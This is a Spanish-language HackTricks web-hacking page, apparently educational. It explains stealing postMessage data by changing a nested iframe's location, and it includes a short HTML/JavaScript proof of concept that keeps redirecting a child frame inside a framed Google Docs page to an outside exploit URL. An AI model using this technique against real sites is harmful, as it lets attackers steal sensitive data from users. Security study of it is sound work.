Español - Ht
HackTricks Training Twitter Linkedin Sponsor

Steal postmessage modifying iframe location

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Equipos Rojos de AWS de HackTricks)!

Cambiando las ubicaciones de los iframes secundarios

Según este informe, si puedes incluir un iframe de una página web sin encabezado X-Frame que contenga otro iframe, puedes cambiar la ubicación de ese iframe secundario.

Por ejemplo, si abc.com tiene efg.com como iframe y abc.com no tiene encabezado X-Frame, podría cambiar efg.com a evil.com en una ubicación cruzada usando, frames.location.

Esto es especialmente útil en postMessages porque si una página está enviando datos sensibles usando un comodín como windowRef.postmessage("","*"), es posible cambiar la ubicación del iframe relacionado (secundario o principal) a una ubicación controlada por un atacante y robar esos datos.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!
AnteriorBypassing SOP with Iframes - 2SiguienteProxy / WAF Protections Bypass

Última actualización